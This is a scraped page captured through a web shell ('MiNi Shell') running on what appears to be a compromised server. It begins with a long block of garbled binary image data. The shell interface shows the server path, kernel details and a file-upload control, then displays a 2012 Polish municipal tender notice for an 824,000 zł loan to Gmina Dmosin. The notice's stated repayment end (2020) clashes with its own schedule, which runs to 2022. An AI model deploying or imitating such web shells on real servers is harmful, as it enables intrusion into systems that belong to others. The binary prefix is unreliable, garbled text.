JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120924/362670-N-2012.html

<p class="kh_header"><b>Dmosin: Udzielenie kredytu długoterminowego na sfinansowanie planowanego deficytu budżetu Gminy Dmosin oraz spłatę wcześniej zaciągniętych zobowiązań w wysokości 824.000,00 zł</b><br>
<b>Numer ogłoszenia: 362670 - 2012; data zamieszczenia: 24.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dmosin , Dmosin 9, 95-061 Dmosin, woj. łódzkie, tel. 046 8747485, faks 046 8746294.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dmosin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie kredytu długoterminowego na sfinansowanie planowanego deficytu budżetu Gminy Dmosin oraz spłatę wcześniej zaciągniętych zobowiązań w wysokości 824.000,00 zł.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia: 
1.	Przedmiotem zamówienia jest udzielenie kredytu długoterminowego  w wysokości 824.000,00zł ( słownie zł: osiemset dwadzieścia cztery tysiące )przeznaczonych na sfinansowanie planowanego deficytu budżetu Gminy Dmosin oraz spłatę wcześniej zaciągniętych zobowiązań.  
2.	Uruchomienie środków kredytu odbywać się będzie każdorazowo na pisemny wniosek Zamawiającego w transzach, których termin i wysokość zostanie określona we wniosku składanym na 2 dni przed uruchomieniem.
3.	Zamawiający zastrzega sobie możliwość nie wykorzystania pełnej kwoty kredytu bez dodatkowych obciążeń finansowych.
4.	Obsługa kredytu będzie dotyczyła faktycznej kwoty wykorzystanego kredytu.
5.	Środki  z uruchomionego  kredytu bankowego będą przekazane na rachunek Gminy Dmosin wskazany przez Zamawiającego.
6.	Okres karencji w spłacie kredytu od dnia postawienia do dyspozycji kredytu do końca trzeciego kwartału 2013r.
7.	Okres spłaty  - 10 lat w tym jeden rok karencji w spłacie kredytu. 
8.	 Spłata całej kwoty zaciągniętego kredytu będzie następowania od końca III  kwartału 2013 roku do czerwca  2020r. tj. przez okres 9 lat w następujących terminach 
i kwotach:

l.p.	          Termin spłaty 	 kwota
1.		20.09.2013	500
2.		20.10.2013	500
3.		20.11.2013	500
4.		20.12.2013	500
5.		20.01.2014	500
6.		20.02.2014	500
7.		20.03.2014	500
8.		20.04.2014	500
9.		20.05.2014	500
10.		20.06.2014	500
11.		20.07.2014	500
12.		20.08.2014	500
13.		20.09.2014	500
14.		20.10.2014	1000
15.		20.11.2014	1000
16.		20.12.2014	1000
17.		20.01.2015	3000
18.		20.02.2015	3000
19.		20.03.2015	3000
20.		20.04.2015	3000
21.		20.05.2015	3000
22.		20.06.2015	3000
23.		20.07.2015	3000
24.		20.08.2015	3500
25.		20.09.2015	4000
26.		20.10.2015	4000
27.		20.11.2015	4000
28.		20.12.2015	5000
29.		20.01.2016	10000
30.		20.02.2016	10000
31.		20.03.2016	10000
32.		20.04.2016	10000
33.		20.05.2016	10000
34.		20.06.2016	10000
35.		20.07.2016	10000
36.		20.08.2016	10000
37.		20.09.2016	10000
38.		20.10.2016	10000
39.		20.11.2016	10000
40.		20.12.2016	10000
41.		20.01.2017	10000
42.		20.02.2017	10000
43.		20.03.2017	10000
44.		20.04.2017	10000
45.		20.05.2017	10000
46.		20.06.2017	10000
47.		20.07.2017	10000
48.		20.08.2017	10000
49.		20.09.2017	10000
50.		20.10.2017	10000
51.		20.11.2017	10000
52.		20.12.2017	10000
53.		20.01.2018	10000
54.		20.02.2018	10000
55.		20.03.2018	10000
56.		20.04.2018	10000
57.		20.05.2018	10000
58.		20.06.2018	10000
59.		20.07.2018	10000
60.		20.08.2018	10000
61.		20.09.2018	10000
62.		20.10.2018	10000
63.		20.11.2018	10000
64.		20.12.2018	10000
65.		20.01.2019	10000
66.		20.02.2019	10000
67.		20.03.2019	10000
68.		20.04.2019	10000
69.		20.05.2019	10000
70.		20.06.2019	10000
71.		20.07.2019	10000
72.		20.08.2019	10000
73.		20.09.2019	10000
74.		20.10.2019	10000
75.		20.11.2019	10000
76.		20.12.2019	10000
77.		20.01.2020	10000
78.		20.02.2020	10000
79.		20.03.2020	10000
80.		20.04.2020	10000
81.		20.05.2020	10000
82.		20.06.2020	10000
83.		20.07.2020	10000
84.		20.08.2020	10000
85.		20.09.2020	10000
86.		20.10.2020	10000
87.		20.11.2020	10000
88.		20.12.2020	10000
89.		20.01.2021	10000
90.		20.02.2021	10000
91.		20.03.2021	10000
92.		20.04.2021	10000
93.		20.05.2021	10000
94.		20.06.2021	10000
95.		20.07.2021	10000
96.		20.08.2021	10000
97.		20.09.2021	10000
98.		20.10.2021	10000
99.		20.11.2021	10000
100.		20.12.2021	10000
101.		20.01.2022	10000
102.		20.02.2022	10000
103.		20.03.2022	10000
104.		20.04.2022	10000
105.		20.05.2022	10000
106.		20.06.2022	3000
                                Razem	824000 zł
		
9.	Wysokość kwartalnych rat spłat kapitału może ulec zmianie w przypadku wykorzystania przez Zamawiającego mniejszej kwoty kredytu.
10.	Do każdej z 106 rat należy naliczyć odsetki od faktycznie zaciągniętego kredytu.
11.	Wykonawca przyjmuje jako zabezpieczenie kredytu weksel in blanco wraz z deklaracją wekslową.
12.	Oprocentowanie kredytu będzie zmienne i ustalone na podstawie stawki bazowej  WIBOR 1M powiększonej o stałą marżę banku. Stawka bazowa jest ustalona na okres 1 miesiąca i stanowi stopę WIBOR 1M z ostatniego dnia roboczego każdego miesiąca i ma zastosowanie do odsetek naliczanych od pierwszego dnia następnego miesiąca kalendarzowego. Zmiana oprocentowania wynikająca ze zmiany stawki WIBOR 1M nie stanowi zmiany warunków umowy i nie wymaga jej wypowiedzenia. 
13.	Zamawiający zastrzega możliwość wcześniejszej spłaty kredytu w części lub całości bez dodatkowych kosztów. W przypadku spłaty kredytu we wcześniejszym terminie, odsetki liczone będą do dnia faktycznej spłaty kredytu, a nie do końca umowy. 
O zmianie terminu spłaty kredytu Zamawiający poinformuje w formie pisemnej Wykonawcę. 
14.	Spłata odsetek będzie następowała w terminach spłaty kwoty zaciągniętego kredytu.
15.	Każda z rat kredytu płatna będzie przelewem tak, aby środki znajdowały się na rachunku banku udzielającego kredytu do 20 każdego miesiąca
16.	Odsetki naliczane będą od kwoty aktualnego rzeczywistego zadłużenia w ratach miesięcznych na podstawie  zawiadomienia przesłanego przez Wykonawcę -Bank.
17.	Marża banku określona w procentach powinna być stała w okresie  kredytowania 
( obowiązywania umowy).
18.	Prowizja od udzielonego kredytu - płatna jednorazowo w dniu wypłaty kredytu. Kredyt nie może być obciążany innymi opłatami, niż prowizja przygotowawcza, marża oraz oprocentowanie.
19.	Zamawiający zastrzega sobie , że kredyt nie może być obciążony dodatkowymi opłatami za ubezpieczenie kredytu, koszty manipulacyjne, lub innymi kosztami.
20.	Zamawiający nie dopuszcza kapitalizacji odsetek..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania za spełniony, gdy Wykonawca złoży wraz z ofertą zezwolenie na prowadzenie działalności bankowej zgodnie z ustawą z dnia 29 sierpnia 1997 r. prawo bankowe (Dz. U. z 2002 r. Nr 72, poz. 665 z późn. zm.), a w przypadku określonym w art. 178 ust. 1 ustawy Prawo Bankowe inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 ustawy Prawo Bankowe ,w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę;
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
   spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek posiadania wiedzy i doświadczenia za spełniony, jeżeli wykonawca złoży wraz z ofertą oświadczenie o spełnianiu warunków udziału 
w postępowaniu o treści odpowiadającej treści art. 22 ust. 1 ustawy Pzp , o którym mowa w Rozdziale 10 pkt 1.ppkt 1.1. niniejszej siwz.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
   spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowanie odpowiednim potencjałem technicznym, jeżeli wykonawca złoży wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu o treści odpowiadającej treści art. 22 ust. 1 ustawy Pzp , o którym mowa w Rozdziale 10 pkt 1.ppkt 1.1. niniejszej siwz.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
   spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do ofert.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia za spełniony, jeżeli wykonawca złoży wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu o treści odpowiadającej treści art. 22 ust. 1 ustawy Pzp , o którym mowa w Rozdziale 10 pkt 1.ppkt 1.1. niniejszej siwz.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
   spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do ofert.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek sytuacji ekonomicznej i finansowej za spełniony, 
gdy Wykonawca złoży wraz z ofertą oświadczenie o spełnianiu warunków udziału 
w postępowaniu o treści odpowiadającej treści art. 22 ust. 1 ustawy Pzp., o którym mowa w Rozdziale 10 pkt 1.ppkt 1.1. niniejszej siwz.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
   spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy muszą być zgodne z art. 144 ustawy Prawo zamówień publicznych. Zamawiający przewiduje, że w ramach umowy można zmienić : 
- zmiany obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron, 
- zmian nazwy, siedziby lub innych danych Wykonawcy , 
- zmianę terminu wykonania umowy wynikającą z przedłużających się procedur administracyjnych (np. związanych z zamówieniami publicznymi), 
- zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego) - powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.
- w uzasadnionych przypadkach, gdy konieczna będzie zmiana terminu realizacji zamówienia, Zamawiający może zmienić termin wzięcia kredytu lub jego spłaty.
- w innych uzasadnionych przypadkach , gdy zajdzie konieczność wprowadzenia zmian wynikających z okoliczności , których nie można było przewidzieć w chwili zawarcia umowy
- w przypadku gdy zmiany postanowień zawartej umowy będzie korzystna dla Zamawiającego wynikły one w trakcie realizacji zamówienia
- w przypadku gdy zajdzie uzasadniona konieczność ograniczenia lub rezygnacji z części lub całości kredytu będącego przedmiotem niniejszego zamówienia.
- Zamawiający zastrzega sobie możliwość zmniejszenia kwoty kredytu lub rezygnacji z kredytu w całości.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dmosin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego w Urzędzie Gminy Dmosin, Dmosin 9, 95-061 Dmosin pokój nr 15a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2012 godzina 10:00, miejsce: W siedzibie Zamawiającego w Urzędzie Gminy Dmosin, Dmosin 9, 95-061 Dmosin w pokoju nr 15a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com